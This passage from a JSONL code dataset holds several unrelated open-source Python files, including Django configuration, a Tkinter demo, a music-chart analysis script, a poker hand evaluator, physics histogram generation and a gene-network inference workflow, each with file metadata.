meter.global_avg))\n else:\n raise NotImplementedError\n\n return self.delimiter.join(loss_str)\n\n\ndef mae(prediction, target):\n \"\"\"\n Computes the mean absolute error between prediction and target\n\n Parameters\n ----------\n\n prediction: torch.Tensor (N, 1)\n target: torch.Tensor (N, 1)\n \"\"\"\n return torch.mean(torch.abs(target - prediction), dim=0)\n\n\ndef mae_ratio(prediction, target):\n \"\"\"\n Computes the mean absolute error between prediction and target\n divided by the absolute values of target\n\n Parameters\n ----------\n\n prediction: torch.Tensor (N, T)\n target: torch.Tensor (N, T)\n \"\"\"\n return torch.mean(\n torch.abs(target - prediction) / (torch.abs(target) + 1e-7), dim=0\n )\n\n\ndef mean_l2_distance(prediction, target):\n \"\"\"\n Computes the mean atomic distances\n\n Parameters\n ----------\n\n prediction: torch.Tensor (N, 3)\n target: torch.Tensor (N, 3)\n\n Return\n ----------\n avg distance: (N,1)\n \"\"\"\n dist = torch.sqrt(torch.sum((target - prediction) ** 2, dim=1))\n return torch.mean(dist)\n","sub_path":"ocpmodels/common/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"31299319","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import Item\n\n\nclass ItemAdmin(admin.ModelAdmin):\n\tlist_display=[\"title\", \"image\", \"price\", \"discount\"]\n\tclass Meta:\n\t\tmodel = Item\n\nadmin.site.register(Item,ItemAdmin)","sub_path":"src/items/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566476435","text":"#tk_helloworld.py\n#Tkinter library import\nimport tkinter as tk\n\ndef event():\n i=1\n new_label=tk.Label(root,text=str(i))\n new_label.pack()\n\n \n#make Tk instance\nroot= tk.Tk()\n\n#class=var+func\n#class declare==frame\n#call constructor(Tk()) of tk instance(tk.)\n#===>to instance\n#size of window\nroot.geometry(\"400x200\")\nlabel=tk.Label(root,text='Hello World!',background=\"green\")\n#===>root==display of tk instance\n#layout of label\nlabel.pack()\n#button\nbutton=tk.Button(root,text='Push Button1',command=event)\nbutton.pack()\n#display root\nroot.display()\n","sub_path":"tk_helloworld.py","file_name":"tk_helloworld.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"415139673","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPlik zawiera globalne ustawienia adresów URL, które użytkownik może wpisywać i skojarzone z nimi\nwidoki które zostaną wywołane przy danym adresie URL. Zmienna urlpatterns opisuje \nadresy i widoki w postaci: \n wyrażenie regularne spełniane przez URL, widok, dodatkowe argumenty.\n\"\"\"\n\nfrom django.conf.urls.defaults import *\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^css/(?P.*)$', 'django.views.static.serve', {'document_root': 'media/css'}),\n (r'^js/(?P.*)$', 'django.views.static.serve', {'document_root': 'media/js'}),\n (r'^gfx/(?P.*)$','django.views.static.serve', {'document_root': 'media/gfx'}),\n (r'^$', 'accounts.views.index'),\n (r'^$/', 'accounts.views.index'),\n (r'^admin/(.*)', admin.site.root),\n (r'^accounts/', include('accounts.urls')),\n (r'^friends/',include('friends.urls')),\n (r'^files/',include('files.urls')),\n)\n","sub_path":"Source/ass8_portal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"365052671","text":"import csv\nimport matplotlib.pyplot as plt\nimport json\n\n\nwith open('./data.csv') as f:\n # we are using DictReader because we want our information to be in dictionary format.\n reader = csv.DictReader(f)\n # some more code\n rolling_list = []\n for i in reader:\n rolling_list.append(i)\n print(rolling_list)\n\n\ndef find_by_name(album_name):\n for hit in rolling_list:\n if hit[\"album\"] == album_name:\n return hit\n\ndef find_by_rank(album_rank):\n for hit in rolling_list:\n if hit[\"number\"] == str(album_rank):\n return hit\n \ndef find_by_year(year):\n album_list = []\n for hit in rolling_list:\n if hit[\"year\"] == str(year):\n album_list.append(hit)\n return album_list\n\ndef find_by_years(start_year, end_year):\n album_by_years = []\n start = start_year\n while start <= end_year:\n album_by_years.extend(find_by_year(start))\n start += 1\n return album_by_years\n\n\ndef find_by_ranks(start_rank, end_rank):\n album_by_ranks = []\n start = start_rank\n while start <= end_rank:\n album_by_ranks.append(find_by_rank(start))\n start += 1\n return album_by_ranks\n\ndef all_titles():\n titles_list = []\n for hit in rolling_list:\n titles_list.append(hit['album'])\n return titles_list\n \ndef all_artists():\n artists_list = []\n for hit in rolling_list:\n artists_list.append(hit['artist'])\n return artists_list\n\n# def artist_most_hits():\n# max_count = 0\n# artist = None\n# artists_list = all_artists()\n# artists_set = set(artists_list)\n# for singer in artists_set:\n# temp_count = artists_list.count(singer)\n# if temp_count >= max_count:\n# max_count = temp_count\n# artist = singer\n# return artist\n\ndef artist_most_hits():\n return max(all_artists(), key = artists_list.count)\n\ndef popular_word():\n word_dict = {}\n titles_list = all_titles()\n for title in titles_list:\n for word in title.split():\n if word in word_dict:\n word_dict[word] +=1 \n else:\n word_dict[word] = 1\n max_count = 0\n max_word = None\n for word in word_dict:\n if word_dict[word] >= max_count:\n max_count = word_dict[word]\n max_word = word\n return max_word\n \ndef histogram_of_album_by_decade():\n plt.hist([int(hit[\"year\"]) for hit in rolling_list], bins=6)\n \ndef histogram_by_genre():\n fig_size = plt.figure(figsize=(50, 20))\n genre_list = []\n for hit in [album['genre'] for album in rolling_list]:\n if type(hit.split(\",\")) == list:\n for genre in hit.split(\",\"):\n genre = genre.rstrip().lstrip()\n genre_list.append(genre)\n else:\n genre_list.append(hit.rstrip().lstrip())\n plt.hist(genre_list, bins=14)\n\n# part 2\n\ntext_file = open('top-500-songs.txt', 'r')\n # read each line of the text file\n # here is where you can print out the lines to your terminal and get an idea \n # for how you might think about re-formatting the data\nlines = text_file.readlines()\nprint(lines)\n\ndef reformat_text_file():\n reformatted = []\n for line in lines:\n reformatted.append(line.strip('\\n').split('\\t'))\n return reformatted\n\ndef reformat_to_dict():\n lst = reformat_text_file()\n category = [\"rank\", 'name', 'artist', 'year']\n album_lst = []\n albums_dict = {\"rank\": None, 'name':None, 'artist':None,'year':None}\n for item in lst:\n for ind in range(len(item)):\n albums_dict[category[ind]] = item[ind]\n album_lst.append(albums_dict.copy())\n return album_lst\n \n \nfile = open('track_data.json', 'r')\njson_data = json.load(file)\n\ndef find_by_name_refactored(data, term, album_name):\n for hit in data:\n if hit[term] == album_name:\n return hit\n\ndef find_by_rank_refactored(data, term, album_rank):\n for hit in data:\n if hit[term] == str(album_rank):\n return hit\n \ndef find_by_year_refactored(data, year):\n album_list = []\n for hit in data:\n if hit[\"year\"] == str(year):\n album_list.append(hit)\n return album_list\n\ndef find_by_years_refactored(data, start_year, end_year):\n album_by_years = []\n start = start_year\n while start <= end_year:\n album_by_years.extend(find_by_year_refactored(data, start))\n start += 1\n return album_by_years\n\n\ndef find_by_ranks_refactored(data, start_rank, end_rank):\n album_by_ranks = []\n start = start_rank\n while start <= end_rank:\n album_by_ranks.append(find_by_rank_refactored(data, start))\n start += 1\n return album_by_ranks\n\ndef all_titles_refactored(data, term):\n titles_list = []\n for hit in data:\n titles_list.append(hit[term])\n return titles_list\n \ndef all_artists_refactored(data):\n artists_list = []\n for hit in data:\n artists_list.append(hit['artist'])\n return artists_list\n\n# def artist_most_hits():\n# max_count = 0\n# artist = None\n# artists_list = all_artists()\n# artists_set = set(artists_list)\n# for singer in artists_set:\n# temp_count = artists_list.count(singer)\n# if temp_count >= max_count:\n# max_count = temp_count\n# artist = singer\n# return artist\n\ndef artist_most_hits_refactored(data):\n return max(all_artists_refactored(data), key =all_artists_refactored(data).count)\n\ndef popular_word_refactored(data, term):\n word_dict = {}\n titles_list = all_titles_refactored(data, term)\n for title in titles_list:\n for word in title.split():\n if word in word_dict:\n word_dict[word] +=1 \n else:\n word_dict[word] = 1\n max_count = 0\n max_word = None\n for word in word_dict:\n if word_dict[word] >= max_count:\n max_count = word_dict[word]\n max_word = word\n return max_word\n \ndef histogram_of_album_by_decade_refactored(data):\n plt.hist([int(hit[\"year\"]) for hit in data], bins=6)\n \ndef artist_with_top_500_songs(data, songs_data):\n artist_count = {}\n for hit in data:\n key = (hit[\"artist\"], hit[\"album\"])\n for song in hit[\"tracks\"]: \n if song in all_titles_refactored(songs_data, \"name\") and key in artist_count:\n artist_count[key] += 1\n elif song in all_titles_refactored(songs_data, \"name\"):\n artist_count[key] = 1\n return artist_count\n\ndef albumWithMostTopSongs(data, songs_data):\n return max(artist_with_top_500_songs(data, songs_data))\n\ndef albumsWithTopSongs(data, songs_data):\n albums_lst = []\n for pair in artist_with_top_500_songs(data, songs_data):\n albums_lst.append(pair[1])\n return albums_lst\n \n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"603838111","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/poker/poker.py\n# Compiled at: 2014-04-28 18:35:26\n__doc__ = '\\nThis module provides functions for comparing seven card\\npoker hands and holdem hands. Note that several lookup\\ntables are immediately build on import to increase performance\\nby eliminating the dot notation of classes.\\n\\nIt includes a 30 MB lookup table which allows approximately\\na 4 times speed increase for holdem2p() over poker_lite.holdem2p().\\n\\nThe hash scheme for the lookup table was inspired by the specialK hand\\nevaluator blog:\\nhttp://specialk-coding.blogspot.com/2010/04/texas-holdem-7-card-evaluator_23.html\\nThe table is populated by the poker_lite.handvalue function.\\n'\nimport itertools, poker_lite, utils\nfrom poker_lite import _IS_FLUSH, _BITS, CARD_MASK\n_SPECIALKS = (0, 1, 5, 22, 98, 453, 2031, 8698, 22854, 83661, 262349, 636345, 1479181)\n_SUITSHIFT = 23\n_RANKMASK = 8388607\n_DECK = [ _r | _s << _SUITSHIFT for _r in _SPECIALKS for _s in (0, 1, 8, 57) ]\n\ndef _ranks_combos():\n for i in xrange(13):\n for j in xrange(i, 13):\n for k in xrange(j, 13):\n for l in xrange(k, 13):\n for m in xrange(l, 13):\n if i == j == k == l == m:\n continue\n for n in xrange(m, 13):\n if j == k == l == m == n:\n continue\n for o in xrange(n, 13):\n if k == l == m == n == o:\n continue\n yield (\n i, j, k, l, m, n, o)\n\n\ndef _build_ranktable():\n ranktable = {}\n offsuits = (i % 4 for i in xrange(1000000))\n for hand in _ranks_combos():\n key = sum(_SPECIALKS[i] for i in hand)\n offhand = [ r * 4 + next(offsuits) for r in hand ]\n val = poker_lite.handvalue(offhand)\n ranktable[key] = val\n\n return ranktable\n\n\ndef _build_suittable():\n flushtable = {}\n for hand, value in enumerate(poker_lite._FLUSH_TABLE):\n if not value:\n continue\n flushtable[hand] = poker_lite.SF | value if poker_lite._STRAIGHT_TABLE[hand] else poker_lite.FLUSH | value\n\n return flushtable\n\n\n_FLUSH_TABLE = _build_suittable()\n_RANK_TABLE = _build_ranktable()\n\ndef handvalue(hand, val=0, computed_cards=[]):\n \"\"\"Return a value of a seven card hand which can be\n compared to the handvalue value of any other hand to\n see if it is better worse or equal.\n\n Only supply the hand. The other kwargs are for internal\n use and efficiency\"\"\"\n deck = _DECK\n for c in hand:\n val += deck[c]\n\n if _IS_FLUSH[(val >> _SUITSHIFT)] != -1:\n flush = 0\n for c in hand + computed_cards:\n flush += _BITS[c]\n\n flush >>= _IS_FLUSH[(val >> _SUITSHIFT)]\n flush &= CARD_MASK\n return _FLUSH_TABLE[flush]\n return _RANK_TABLE[(val & _RANKMASK)]\n\n\ndef compare(h1, h2):\n \"\"\"Return an integer representing the winner of two\n seven card hands.\n 0 -> h1 wins\n 1 -> h2 wins\n 2 -> tie\"\"\"\n r1 = handvalue(h1)\n r2 = handvalue(h2)\n if r1 > r2:\n return 0\n else:\n if r2 > r1:\n return 1\n return 2\n\n\ndef holdem2p(h1, h2, board):\n \"\"\"Return an integer representing the winner of two\n holdem hands and a board.\n 0 -> h1 wins\n 1 -> h2 wins\n 2 -> tie\"\"\"\n deck = _DECK\n val = 0\n for c in board:\n val += deck[c]\n\n c1, c2 = h1\n v1 = val + deck[c1] + deck[c2]\n if _IS_FLUSH[(v1 >> _SUITSHIFT)] != -1:\n flush = _BITS[c1] + _BITS[c2]\n for c in board:\n flush += _BITS[c]\n\n flush >>= _IS_FLUSH[(v1 >> _SUITSHIFT)]\n flush &= CARD_MASK\n v1 = _FLUSH_TABLE[flush]\n else:\n v1 = _RANK_TABLE[(v1 & _RANKMASK)]\n c1, c2 = h2\n v2 = val + deck[c1] + deck[c2]\n if _IS_FLUSH[(v2 >> _SUITSHIFT)] != -1:\n flush = _BITS[c1] + _BITS[c2]\n for c in board:\n flush += _BITS[c]\n\n flush >>= _IS_FLUSH[(v2 >> _SUITSHIFT)]\n flush &= CARD_MASK\n v2 = _FLUSH_TABLE[flush]\n else:\n v2 = _RANK_TABLE[(v2 & _RANKMASK)]\n if v1 > v2:\n return 0\n if v2 > v1:\n return 1\n return 2\n\n\n_schemes2p = [\n [\n 0], [1], [0, 1]]\n\ndef multi_holdem(hands, board):\n \"\"\"Return a list indices representing hands that win or tie.\"\"\"\n if len(hands) == 2:\n return _schemes2p[holdem2p(hands[0], hands[1], board)]\n deck = _DECK\n boardval = 0\n for c in board:\n boardval += deck[c]\n\n results = []\n best = 0\n for i, h in enumerate(hands):\n v = handvalue(h, boardval, board)\n if v > best:\n results = [\n i]\n best = v\n elif v == best:\n results.append(i)\n\n return results\n\n\ndef monte_carlo(hands, trials=100000):\n \"\"\"\n Return ev of each player.\n\n hands -> list of 2 - 22 hands\n trials -> the approximate number of simulations to run\n \"\"\"\n nplayers = len(hands)\n wins = [ 0 for __ in range(nplayers) ]\n nboards = (52 - nplayers * 2) / 5\n scheme = [5] * nboards\n deck = utils.Deck(sum(hands, []))\n for t in xrange(trials / nboards):\n for b in deck.deal(scheme):\n winners = multi_holdem(hands, b)\n nwinners = len(winners)\n for w in winners:\n wins[w] += 1.0 / nwinners\n\n trials = trials / nboards * nboards\n return [ w / trials for w in wins ]\n\n\ndef full_enumeration(hands, board=[]):\n \"\"\"\n Return ev of each player.\n\n hands -> list of two card hands\n board -> any # of cards 0-5.\n \"\"\"\n nplayers = len(hands)\n if nplayers == 2:\n return enum2p(hands[0], hands[1], board)\n if nplayers == 1:\n return [1.0]\n wins = [ 0 for __ in range(nplayers) ]\n trials = 0\n dead = sum(hands, board)\n deck = utils.Deck(dead)\n needed_cards = 5 - len(board)\n for cards in itertools.combinations(deck, needed_cards):\n winners = multi_holdem(hands, board + list(cards))\n nwinners = len(winners)\n trials += 1\n for w in winners:\n wins[w] += 1.0 / nwinners\n\n return [ w / trials for w in wins ]\n\n\ndef enum2p(h1, h2, board=[]):\n \"\"\"\n Return ev of each player.\n\n hands -> list of two card hands\n board -> any # of cards 0-5.\n \"\"\"\n wins = [\n 0, 0, 0]\n dead = h1 + h2 + board\n deck = utils.Deck(dead)\n needed_cards = 5 - len(board)\n for cards in itertools.combinations(deck, needed_cards):\n winners = holdem2p(h1, h2, board + list(cards))\n wins[winners] += 1\n\n ev1 = (wins[0] + 0.5 * wins[2]) / sum(wins)\n return [\n ev1, 1.0 - ev1]","sub_path":"pycfiles/pol-0.4.1.tar/poker.py","file_name":"poker.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"198267191","text":"import numpy as np\nimport ROOT as R\n\nfrom prod_util import dets_for_phase, stage2_pbp_path\nfrom prod_util import fit_hist_ibd_path, fit_hist_acc_path\n\nnbins_lbnl = 37\nnbins_fine = 240\n\n\ndef binning_lbnl():\n edges = np.concatenate([[0.7],\n np.arange(1, 8, 0.2),\n [8, 12]])\n assert len(edges) == 1 + nbins_lbnl\n return edges\n\n\n# We don't actually need this since stage2 gives us this binning already\ndef binning_fine():\n return np.linspace(0, 12, 1 + nbins_fine)\n\n\ndef gen_hists_(phase, tag, config):\n path_ibd = fit_hist_ibd_path(phase, tag, config)\n path_acc = fit_hist_acc_path(phase, tag, config)\n f_ibd = R.TFile(path_ibd, 'RECREATE')\n f_acc = R.TFile(path_acc, 'RECREATE')\n\n for site in [1, 2, 3]:\n path_in = stage2_pbp_path(site, phase, tag, config)\n f = R.TFile(path_in)\n\n # fitter expects all 8 dets in the file, even in 6/7AD periods\n for det in dets_for_phase(site, 2): # phase 2 = 8AD\n h_ibd = f.Get(f'h_ibd_AD{det}')\n h_acc = f.Get(f'h_single_AD{det}')\n\n name_ibd_lbnl = f'h_ibd_eprompt_inclusive_eh{site}_ad{det}'\n name_ibd_fine = f'h_ibd_eprompt_fine_inclusive_eh{site}_ad{det}'\n name_acc_lbnl = f'h_accidental_eprompt_inclusive_eh{site}_ad{det}'\n name_acc_fine = f'h_accidental_eprompt_fine_inclusive_eh{site}_ad{det}'\n\n if h_ibd:\n h_ibd_lbnl = h_ibd.Rebin(nbins_lbnl, name_ibd_lbnl,\n binning_lbnl())\n h_ibd_fine = h_ibd.Rebin(nbins_fine, name_ibd_fine,\n binning_fine())\n h_acc_lbnl = h_acc.Rebin(nbins_lbnl, name_acc_lbnl,\n binning_lbnl())\n h_acc_fine = h_acc.Rebin(nbins_fine, name_acc_fine,\n binning_fine())\n else:\n h_ibd_lbnl = R.TH1F(name_ibd_lbnl, name_ibd_lbnl,\n nbins_lbnl, binning_lbnl())\n h_ibd_fine = R.TH1F(name_ibd_fine, name_ibd_fine,\n nbins_fine, binning_fine())\n h_acc_lbnl = R.TH1F(name_acc_lbnl, name_acc_lbnl,\n nbins_lbnl, binning_lbnl())\n h_acc_fine = R.TH1F(name_acc_fine, name_acc_fine,\n nbins_fine, binning_fine())\n\n f_ibd.cd()\n h_ibd_lbnl.Write()\n h_ibd_fine.Write()\n\n f_acc.cd()\n h_acc_lbnl.Write()\n h_acc_fine.Write()\n\n f_ibd.Close()\n f_acc.Close()\n\n\ndef gen_hists(tag, config):\n for phase in [1, 2, 3]:\n gen_hists_(phase, tag, config)\n","sub_path":"fit_prep/hist_gen.py","file_name":"hist_gen.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"86709654","text":"\"\"\"\nBase implementation for high level workflow.\n\nThe goal of this design is to make it easy to share\ncode among different variants of the Inferelator workflow.\n\"\"\"\n\nfrom inferelator_ng import utils\nfrom inferelator_ng.utils import Validator as check\nfrom inferelator_ng import default\nfrom inferelator_ng.prior_gs_split_workflow import split_for_cv, remove_prior_circularity\nimport numpy as np\nimport os\nimport datetime\nimport pandas as pd\n\nimport gzip\nimport bz2\n\n\nclass WorkflowBase(object):\n # Common configuration parameters\n input_dir = None\n file_format_settings = default.DEFAULT_PD_INPUT_SETTINGS\n file_format_overrides = dict()\n expression_matrix_file = default.DEFAULT_EXPRESSION_FILE\n tf_names_file = default.DEFAULT_TFNAMES_FILE\n meta_data_file = default.DEFAULT_METADATA_FILE\n priors_file = default.DEFAULT_PRIORS_FILE\n gold_standard_file = default.DEFAULT_GOLDSTANDARD_FILE\n output_dir = None\n random_seed = default.DEFAULT_RANDOM_SEED\n num_bootstraps = default.DEFAULT_NUM_BOOTSTRAPS\n\n # Flags to control splitting priors into a prior/gold-standard set\n split_priors_for_gold_standard = False\n split_gold_standard_for_crossvalidation = False\n cv_split_ratio = default.DEFAULT_GS_SPLIT_RATIO\n cv_split_axis = default.DEFAULT_GS_SPLIT_AXIS\n\n # Computed data structures [G: Genes, K: Predictors, N: Conditions\n expression_matrix = None # expression_matrix dataframe [G x N]\n tf_names = None # tf_names list [k,]\n meta_data = None # meta data dataframe [G x ?]\n priors_data = None # priors data dataframe [G x K]\n gold_standard = None # gold standard dataframe [G x K]\n\n # Hold the KVS information\n rank = 0\n kvs = None\n tasks = None\n\n def __init__(self, initialize_mp=True):\n # Connect to KVS and get environment variables\n if initialize_mp:\n self.initialize_multiprocessing()\n self.get_environmentals()\n\n def initialize_multiprocessing(self):\n \"\"\"\n Override this if you want to use something besides KVS for multiprocessing.\n \"\"\"\n from inferelator_ng.kvs_controller import KVSController\n self.kvs = KVSController()\n\n def get_environmentals(self):\n \"\"\"\n Load environmental variables into class variables\n \"\"\"\n for k, v in utils.slurm_envs().items():\n setattr(self, k, v)\n\n def startup(self):\n \"\"\"\n Startup by preprocessing all data into a ready format for regression.\n \"\"\"\n self.startup_run()\n self.startup_finish()\n\n def startup_run(self):\n \"\"\"\n Execute any data preprocessing necessary before regression. Startup_run is mostly for reading in data\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def startup_finish(self):\n \"\"\"\n Execute any data preprocessing necessary before regression. Startup_finish is mostly for preprocessing data\n prior to regression\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def run(self):\n \"\"\"\n Execute workflow, after all configuration.\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def get_data(self):\n \"\"\"\n Read data files in to data structures.\n \"\"\"\n\n self.read_expression()\n self.read_tfs()\n self.read_metadata()\n self.set_gold_standard_and_priors()\n\n def read_expression(self, file=None):\n \"\"\"\n Read expression matrix file into expression_matrix\n \"\"\"\n if file is None:\n file = self.expression_matrix_file\n self.expression_matrix = self.input_dataframe(file)\n\n def read_tfs(self, file=None):\n \"\"\"\n Read tf names file into tf_names\n \"\"\"\n if file is None:\n file = self.tf_names_file\n\n tfs = self.input_dataframe(file, index_col=None)\n assert tfs.shape[1] == 1\n self.tf_names = tfs.values.flatten().tolist()\n\n def read_metadata(self, file=None):\n \"\"\"\n Read metadata file into meta_data or make fake metadata\n \"\"\"\n if file is None:\n file = self.meta_data_file\n\n try:\n self.meta_data = self.input_dataframe(file, index_col=None)\n except IOError:\n self.meta_data = self.create_default_meta_data(self.expression_matrix)\n\n def set_gold_standard_and_priors(self):\n \"\"\"\n Read priors file into priors_data and gold standard file into gold_standard\n \"\"\"\n self.priors_data = self.input_dataframe(self.priors_file)\n\n if self.split_priors_for_gold_standard:\n self.split_priors_into_gold_standard()\n else:\n self.gold_standard = self.input_dataframe(self.gold_standard_file)\n\n if self.split_gold_standard_for_crossvalidation:\n self.cross_validate_gold_standard()\n\n try:\n check.index_values_unique(self.priors_data.index)\n except ValueError as v_err:\n utils.Debug.vprint(\"Duplicate gene(s) in prior index\", level=0)\n utils.Debug.vprint(str(v_err), level=0)\n\n try:\n check.index_values_unique(self.priors_data.columns)\n except ValueError as v_err:\n utils.Debug.vprint(\"Duplicate tf(s) in prior index\", level=0)\n utils.Debug.vprint(str(v_err), level=0)\n\n def split_priors_into_gold_standard(self):\n \"\"\"\n Break priors_data in half and give half to the gold standard\n \"\"\"\n\n if self.gold_standard is not None:\n utils.Debug.vprint(\"Existing gold standard is being replaced by a split from the prior\", level=0)\n self.priors_data, self.gold_standard = split_for_cv(self.priors_data,\n self.cv_split_ratio,\n split_axis=self.cv_split_axis,\n seed=self.random_seed)\n\n utils.Debug.vprint(\"Prior split into a prior {pr} and a gold standard {gs}\".format(pr=self.priors_data.shape,\n gs=self.gold_standard.shape),\n level=0)\n\n def cross_validate_gold_standard(self):\n \"\"\"\n Sample the gold standard for crossvalidation, and then remove the new gold standard from the priors\n \"\"\"\n\n utils.Debug.vprint(\"Resampling prior {pr} and gold standard {gs}\".format(pr=self.priors_data.shape,\n gs=self.gold_standard.shape), level=0)\n _, self.gold_standard = split_for_cv(self.gold_standard,\n self.cv_split_ratio,\n split_axis=self.cv_split_axis,\n seed=self.random_seed)\n self.priors_data, self.gold_standard = remove_prior_circularity(self.priors_data, self.gold_standard,\n split_axis=self.cv_split_axis)\n utils.Debug.vprint(\"Selected prior {pr} and gold standard {gs}\".format(pr=self.priors_data.shape,\n gs=self.gold_standard.shape), level=0)\n\n def input_path(self, filename, mode='r'):\n \"\"\"\n Join filename to input_dir\n \"\"\"\n\n if filename.endswith(\".gz\"):\n opener = gzip.open\n elif filename.endswith(\".bz2\"):\n opener = bz2.BZ2File\n else:\n opener = open\n\n return opener(os.path.abspath(os.path.join(self.input_dir, filename)), mode=mode)\n\n def input_dataframe(self, filename, index_col=0):\n \"\"\"\n Read a file in as a pandas dataframe\n \"\"\"\n\n file_settings = self.file_format_settings.copy()\n if filename in self.file_format_overrides:\n file_settings.update(self.file_format_overrides[filename])\n\n with self.input_path(filename) as fh:\n return pd.read_table(fh, index_col=index_col, **file_settings)\n\n def append_to_path(self, var_name, to_append):\n \"\"\"\n Add a string to an existing path variable in class\n \"\"\"\n path = getattr(self, var_name, None)\n if path is None:\n raise ValueError(\"Cannot append to None\")\n setattr(self, var_name, os.path.join(path, to_append))\n\n @staticmethod\n def create_default_meta_data(expression_matrix):\n \"\"\"\n Create a meta_data dataframe from basic defaults\n \"\"\"\n metadata_rows = expression_matrix.columns.tolist()\n metadata_defaults = {\"isTs\": \"FALSE\", \"is1stLast\": \"e\", \"prevCol\": \"NA\", \"del.t\": \"NA\", \"condName\": None}\n data = {}\n for key in metadata_defaults.keys():\n data[key] = pd.Series(data=[metadata_defaults[key] if metadata_defaults[key] else i for i in metadata_rows])\n return pd.DataFrame(data)\n\n def filter_expression_and_priors(self):\n \"\"\"\n Guarantee that each row of the prior is in the expression and vice versa.\n Also filter the priors to only includes columns, transcription factors, that are in the tf_names list\n \"\"\"\n expressed_targets = self.expression_matrix.index\n expressed_or_prior = expressed_targets.union(self.priors_data.columns)\n keeper_regulators = expressed_or_prior.intersection(self.tf_names)\n\n if len(keeper_regulators) == 0 or len(expressed_targets) == 0:\n raise ValueError(\"Filtering will result in a priors with at least one axis of 0 length\")\n\n self.priors_data = self.priors_data.loc[expressed_targets, keeper_regulators]\n self.priors_data = pd.DataFrame.fillna(self.priors_data, 0)\n\n def get_bootstraps(self):\n \"\"\"\n Generate sequence of bootstrap parameter objects for run.\n \"\"\"\n col_range = range(self.response.shape[1])\n random_state = np.random.RandomState(seed=self.random_seed)\n return random_state.choice(col_range, size=(self.num_bootstraps, self.response.shape[1])).tolist()\n\n def emit_results(self):\n \"\"\"\n Output result report(s) for workflow run.\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def is_master(self):\n \"\"\"\n Return True if this is the rank-0 (master) thread\n \"\"\"\n\n if self.rank == 0:\n return True\n else:\n return False\n\n def create_output_dir(self):\n \"\"\"\n Set a default output_dir if nothing is set. Create the path if it doesn't exist.\n \"\"\"\n if self.output_dir is None:\n self.output_dir = os.path.join(self.input_dir, datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n try:\n os.makedirs(self.output_dir)\n except OSError:\n pass\n","sub_path":"inferelator_ng/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"638720541","text":"import os\n\nfrom glob import glob\n\nfrom s64da_benchmark_toolkit.prepare import PrepareBenchmarkFactory, TableGroup\nfrom benchmarks.htap import htap_loader as loader\nfrom benchmarks.htap.lib.helpers import WAREHOUSES_SF_RATIO\n\n\nclass PrepareBenchmark(PrepareBenchmarkFactory):\n PrepareBenchmarkFactory.PYTHON_LOADER = True\n PrepareBenchmarkFactory.DO_SHUFFLE = True\n\n PrepareBenchmarkFactory.TABLES = (TableGroup(\n 'warehouse',\n 'item',\n 'region',\n 'nation',\n 'supplier'\n ),)\n PrepareBenchmarkFactory.TABLES_ANALYZE = (TableGroup(\n 'district',\n 'customer',\n 'history',\n 'orders',\n 'new_orders',\n 'order_line',\n 'stock',\n 'item',\n 'warehouse',\n ),)\n\n def get_ingest_tasks(self, table):\n data_dir = self.args.data_dir\n if data_dir:\n raise ValueError(\"Cannot use data dir with htap as this doesn't work with the process executor\")\n\n else:\n dsn = self.args.dsn\n start_date = self.args.start_date\n if table in ['item', 'region', 'nation', 'supplier']:\n func_name = 'load_{}'.format(table)\n func = getattr(loader, func_name)\n return [(func, dsn)]\n elif table == 'warehouse':\n warehouses = range(1, self.args.scale_factor*WAREHOUSES_SF_RATIO + 1)\n return [(loader.load_warehouse, dsn, w_id, start_date)\n for w_id in warehouses]\n\n raise ValueError(f'Unknown table {table}')\n","sub_path":"benchmarks/htap/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"401781808","text":"# Copyright (c) 2021, Galois, Inc.\n#\n# All Rights Reserved\n#\n# This material is based upon work supported by the Defense Advanced Research\n# Projects Agency (DARPA) under Contract No. FA8750-20-C-0203.\n#\n# Any opinions, findings and conclusions or recommendations expressed in this\n# material are those of the author(s) and do not necessarily reflect the views\n# of the Defense Advanced Research Projects Agency (DARPA).\n\nfrom migration_helpers.name_space import rack\nfrom ontology_changes import AtMost, ChangeCardinality, Commit, RenameProperty\n\nPROV_S = rack(\"PROV-S\")\n\ncommit = Commit(\n number=\"833ef18f5024fee255f77887de2c8e9bc136e56d\",\n changes=[\n # PROV-S.sadl\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"THING\",\n property_id=\"identifier\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"THING\",\n property_id=\"title\",\n to_cardinality=AtMost(1),\n ),\n ChangeCardinality(\n name_space=PROV_S,\n class_id=\"THING\",\n 